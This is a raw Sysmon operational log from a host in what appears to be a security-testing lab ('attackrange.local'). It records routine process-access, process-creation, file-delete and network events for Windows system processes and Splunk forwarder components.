22:03:10.523{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.523{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-849E-613A-0197-03000000C801}5644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.523{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-849E-613A-0197-03000000C801}5644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.509{B81B27B7-849E-613A-0197-03000000C801}5644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.208{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25BEE0ABC18B1EDCBD31A1EACCD6678A,SHA256=5C2C2AA98D81EF21AFD8D540FC9B88FB23810EE0341160C8690C8616A9CB93C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:36.394{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62292-false10.0.1.12-8000- 23542300x800000000000000035129531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.591{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFFD2EDB6C446B82F814C293E6FE0EA2,SHA256=97014DAED761BCB347F010747872B6EE5B2DB9DE9F7CDA1BF2F32BBCD7DB445E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.591{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D7C7A54FD59F264DDC57A2F8DB1C432,SHA256=B2C9121099C0128AAE0599727819772A09B0E8398E10A70B5C15E8CFB8A8A8AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00DDEAAEBFAB94F11F12A01FE5AD63B5,SHA256=F8BB59D85245255BEC6754F70B7A3F55533062F83911FDE5F2B840D54CE308EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.223{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-849F-613A-0297-03000000C801}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.223{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.223{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.223{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.223{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.223{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-849F-613A-0297-03000000C801}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.223{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-849F-613A-0297-03000000C801}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:11.208{B81B27B7-849F-613A-0297-03000000C801}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035129535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:12.905{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:12.905{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:12.291{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4327BBEB317EB938A5B69BD8F766B9C1,SHA256=FF60E64064733AE829D357BABF8CAEF61D3573B08FA310411A9BA9FFE2FF4568,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.635{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9BFFD973D8400BDC25AF6FD24F791C5E,SHA256=EB18E23C9D1ABDDE6E0D8858F5959A41CCF1871F4D3EC273FC61F1C0E0747CCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.451{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=47F611DB37C277787233F64F63F1CEED,SHA256=40A38F8F05D51343F5E7A67A029E5BF99E34BC6C989BCF4D045CA9E1B8FD7CDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.451{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E43981C92BEE26C4019B07C24CF94C11,SHA256=1C2B39DA36C89E66350ED7DA7B9CE2DE34AEAB4CBA29C5D9FAAB918F06B8EF94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.366{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.366{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.351{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.351{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.297{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.297{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.297{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 